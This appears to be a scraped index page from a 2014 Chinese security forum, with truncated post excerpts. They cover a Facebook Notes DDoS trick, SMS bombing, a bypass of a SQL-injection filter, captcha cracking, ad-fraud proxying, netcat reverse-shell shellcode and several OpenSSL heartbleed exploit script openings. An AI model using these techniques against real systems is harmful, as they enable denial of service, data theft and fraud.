闯关地址:http://attack.onebox.so.com/ 第一关 Q: 第二关需要从hack.360.cn进入,直接点击按钮可行不通哦!~
Using Facebook Notes to DDoS any website
Facebook Notes allows users to include <img> tags. Whenever a <img> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood. Steps to re-create the bug as reported to Facebook Bug Bounty on March 03, 2014.
你想知道你基友安卓系统QQ影音、暴风影音里面加密珍藏的私密视频吗?
你想知道你“*友”安卓系统暴风影音里面珍藏的私密视频吗? 江南的鱼 | 2014-04-25 12:24 安卓平板手机什么的,如果装了暴风影音播放器,而将私密视频文件存放在私密
双系统的UEFI引导方案及失败后的修复方法
接上文:教程:如何无损从MBR引导更改为UEFI 本教程需要用到前篇文章中的工具,如果没有请到上文下载。这里不另外发了。 双系统UEFI引导设置
「猜想」之手机截断之短信轰炸,构造超长手机号码绕过同一号码拦截限制!
「猜想」之手机截断之短信轰炸 safe121 (Great Leader Kim Jong-Un General Long Live!!!) | 2014-04-22 09:37 喜欢玩电话的机油们可能会发现, 拨打13748185006和拨打13748185006123
怎么知道某个关键词的一天搜索数量?百度等搜索引擎关键词搜索量?
怎么知道某个关键词的一天搜索数量? 路人5 | 2014-03-01 13:07 怎么知道某个关键词的一天搜索数量?,本人是一个站长啊,被那些刷关键词的人给坑了,做了一个100
Root后绕过支付宝、QQ密码,这种手机APP访问密码的绕过问题,说明设计很low?
这种手机APP访问密码的绕过问题,是否说明设计很low? 疯狗 (你在乌云这么叼,你家人知道么?) | 2014-04-23 16:52 源自 root很危险!安卓QQ/支付宝密码
Mysql Insert into set 语法绕过 360scan insert 防注入
360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into
教程:如何无损从MBR引导更改为UEFI
学校龟速。无法提供图片,但是我会比较详细地写出步骤。如有问题请留言,不保证全都会,失败别骂我,提供失败后的修复方案。 警告!!系统必须为win
创业:从年销售几十万到月薪几千,我如何才能逆转,如何做一个本土招聘网站?
从年销售几十万到月薪几千,我如何才能逆转 随时回来 (我们做一些很酷的事,去改变世界) | 2014-04-21 09:04 这个板块没有人发帖,那天我突然间打破了寂静···· 之
从QQ点赞里看到的商机,如何利用QQ推出的名片点赞功能快速大量捞金!
以下内容摘自知乎:如何开拓一个互联网或者物联网的新兴市场? 每一个互联网产品背后都有一些隐藏的产品链,你有没有过开拓互联网新兴市场的经历,具体
成人用品创业之路经验分享,我是如何拉到百万投资卖充气娃娃创业的
成人用品创业之路经验分享(2014-4-21日更新) Metasploit (admin@metasploit.com.cn) | 2014-04-20 23:11 声明:此文章仅为个人见解,文笔有限,如有不妥请大家多多包涵和指教。希望在这里可
识别wooyun的验证码,wooyun验证码识别,识别乌云验证码的详细分析
这两天想学一下验证码的识别,那就拿简单的入手吧,也不舍近求远了,就拿大乌云的验证码试试吧。 乌云的验证码很规则简单,以前也有人做过实验,基本图
讨论:快播流量矿石所消耗的cpu和流量产生了实际价值么?
快播流量矿石所消耗的cpu和流量产生了实际价值么 xsser (十根阳具有长短!!) | 2014-04-20 13:24 他描述的模式是说产生了cdn的价值 这点是真的么? [原文地址] 各
逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势
在服务器上发现了挖矿程序,求爆菊姿势 clzzy (南无阿弥陀佛) | 2014-04-16 17:24 在服务器上发现了上图的流量矿石挖矿程序,求爆菊姿势,程序是自登陆的,一闪而过,密
使用代理ip,浏览器会被网站获取到哪些信息?如何刷广告联盟不被发现?
使用代理 ip 浏览器会被网站获取到哪些信息 return | 2014-04-17 17:29 这种代理ip两大使用场景比较多:换IP刷投票,换IP做网兼,换IP玩游戏,换IP注册账号,换I
关于FTP弱口令扫描的,为什么经常见有人搞一些FTP弱口令扫描?
关于FTP弱口令扫描的,懂行的高手来麻烦解答一下 zeuser (很高兴和大家交流~~) | 2014-04-18 01:21 经常见有人搞一些FTP弱口令扫描,就算扫到了帐号和密码有什么
知识科普:iis的一个小疑问,拿到iis匿名访问的帐号密码,能否直接getshell?
关于iis安全的一个小疑问 Mas | 2014-04-18 08:26 iis设置web站点的时候要设置一个用来匿名访问的帐号 假设我知道这个帐号和密码 能不能直接getshell?
TrueCrypt 的一个[可能]的缺陷,如果密码恢复光盘被发现会怎么样?
Truecrypt的一个[可能]的缺陷 safe121 (Great Leader Kim Jong-Un General Long Live!!!) | 2014-04-16 05:52 @核攻击结帖..我土鳖了...恢复光盘不包含密码信息.....感谢核攻击的回答 ---------------------------------------------------------------
WordPress 更新至 3.8.2 修复多个漏洞
在被OpenSSL刷屏的时候,WordPress更新。 WordPress 3.8.2现在已经提供下载,最新的版本更新了几个重要的安全问题,所以推荐更新。 WordPress 3.
WordPress 3.8.2 补丁分析 HMAC timing attack
author: anthrax@insight-labs.org 0x00 背景 在github翻来覆去看了半天,官方版的diff只在php里改动了一个位置: - if ( $hmac != $hash ) { + if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) { WP的
WordPress 3.8.2 cookie伪造漏洞再分析
0x00 背景 看了WordPress 3.8.2补丁分析 HMAC timing attack,眼界大开,原来还可以利用时间差来判断HMAC。 但我总觉得这个漏洞并不是简单的
Angry Birds和广告系统泄露个人信息——FireEye对Angry Birds的分析
from:http://www.fireeye.com/blog/technical/mobile-threats/2014/03/a-little-bird-told-me-personal-information-sharing-in-angry-birds-and-its-ad-libraries.html 0x00 背景 很多流行的app,包括愤怒的小鸟在内,收集并且分享玩家的个人信息的广泛程度,远远超过大多数人所了解的。 一些媒体只是进行了表面的报道,
openssl 多线程 多域名 EXP,支持自定义端口,保存二进制文件,节省空间
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. # Multi process and bin dump version by anthrax@insight-labs.org import sys import struct import socket import time import select import re from multiprocessing import Process,Lock,Manager THREADS = 5 lock = Lock() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00
openssl 漏洞利用程序,支持smtp, pop3, imap, ftp, or xmpp的POC
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols # The authors disclaim copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls',
OpenSSL 漏洞利用程序脚本 POC,OpenSSL“heartbleed”重大安全漏洞!
OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read overrun (CVE-2014-0160) ========================================== A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org>
论防刷票、恶意提交表单:公司网站被恶意提交订单,看你如何解决?
公司网站被恶意提交订单,看你如何解决? 情逍遥 | 2014-04-02 10:23 http://www.178wh.com/bdjs/?16 公司网站,可以提交订单。整天闲在蛋碎的人来提交很多没用的订单,各种XSS, 这种还好, 都是
Flappy Bird 恶意程序详细分析
0x00 背景 Flappy Bird是在年初的时候非常火爆的一个小游戏,但是后来作者在2014年2月10日将其在Apple与Google商店下架,因为这游戏太容
2014 最新 web qq 密码的加密方式分析过程,WebQQ 登陆密码加密算法分析
授人以鱼,不如授人以渔,今天就分享一个 分析qq加密的过程。 工具:谷歌浏览器自带的的调试工具(在浏览器中按F12呼出) 以下是全过程,历时4个的
使用netcat进行反弹链接的shellcode
from:http://morgawr.github.io/hacking/2014/03/29/shellcode-to-reverse-bind-with-netcat/ 这篇文章主要是谈,在远程溢出时怎样构造shellcode,才能形成一个有效的反弹链接。 0x00 反向绑定远程shell 让本地主机和远程shell建